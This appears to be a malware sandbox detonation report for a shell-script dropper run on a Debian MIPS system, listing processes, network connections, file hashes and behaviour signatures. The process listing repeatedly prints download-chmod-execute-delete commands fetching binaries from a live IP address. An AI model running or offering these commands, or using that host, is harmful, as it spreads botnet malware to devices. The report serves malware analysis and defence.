[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/chmod

[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq

[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/rm

[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/wget

[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/chmod

[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ

[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/rm

[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/chmod

[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e

[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/rm

[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/wget

[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/chmod

[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t

[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/rm

[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/wget

[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/chmod

[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5

[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/rm

[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/wget

[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/chmod

[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/rm

[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/wget

[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/chmod

[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx

[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/rm

[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/wget

[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/chmod

[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo

[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/rm

[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/wget

[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 08:15

Reported

2024-11-21 08:17

Platform

debian9-mipsel-20240418-en

Max time kernel

81s

Max time network

84s

Command Line

[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB N/A
N/A /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx N/A
N/A /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo N/A
N/A /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 N/A
N/A /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X N/A
N/A /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l N/A
N/A /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc N/A
N/A /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv N/A
N/A /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc N/A
N/A /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq N/A
N/A /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ N/A
N/A /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e N/A
N/A /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t N/A
N/A /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 N/A
N/A /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc N/A
N/A /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq N/A
N/A /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ N/A
N/A /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e N/A
N/A /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t N/A
N/A /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 N/A
N/A /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB N/A
N/A /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx N/A
N/A /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo N/A
N/A /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 N/A
N/A /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X N/A
N/A /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l N/A
N/A /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc N/A
N/A /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /usr/bin/curl N/A
File opened for modification /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /usr/bin/curl N/A
File opened for modification /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /usr/bin/curl N/A
File opened for modification /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /usr/bin/curl N/A
File opened for modification /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /usr/bin/curl N/A
File opened for modification /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /usr/bin/curl N/A
File opened for modification /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /usr/bin/curl N/A
File opened for modification /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /usr/bin/curl N/A
File opened for modification /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /usr/bin/curl N/A
File opened for modification /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /usr/bin/curl N/A
File opened for modification /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /usr/bin/curl N/A
File opened for modification /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /usr/bin/curl N/A
File opened for modification /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /usr/bin/curl N/A
File opened for modification /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /usr/bin/curl N/A
File opened for modification /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /usr/bin/curl N/A
File opened for modification /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /usr/bin/curl N/A
File opened for modification /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /usr/bin/curl N/A
File opened for modification /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /usr/bin/curl N/A
File opened for modification /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /usr/bin/curl N/A
File opened for modification /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /usr/bin/curl N/A
File opened for modification /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /usr/bin/curl N/A
File opened for modification /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /usr/bin/curl N/A
File opened for modification /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /usr/bin/curl N/A
File opened for modification /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /usr/bin/curl N/A
File opened for modification /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /usr/bin/curl N/A
File opened for modification /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /usr/bin/curl N/A
File opened for modification /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /usr/bin/curl N/A
File opened for modification /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /usr/bin/curl N/A

Processes

/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh

[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/chmod

[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/rm

[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/wget

[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/chmod

[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx

[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/rm

[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/wget

[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/chmod

[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo

[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/rm

[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/wget

[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/chmod

[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7

[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/rm

[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/wget

[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/chmod

[chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X

[./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/rm

[rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/wget

[wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/chmod

[chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l

[./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/rm

[rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/wget

[wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/chmod

[chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc

[./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/rm

[rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/wget

[wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/chmod

[chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv

[./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/rm

[rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/usr/bin/wget

[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/chmod

[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc

[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/rm

[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/wget

[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/chmod

[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq

[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/rm

[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/wget

[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/chmod

[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ

[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/rm

[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/chmod

[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e

[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/rm

[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/wget

[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/chmod

[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

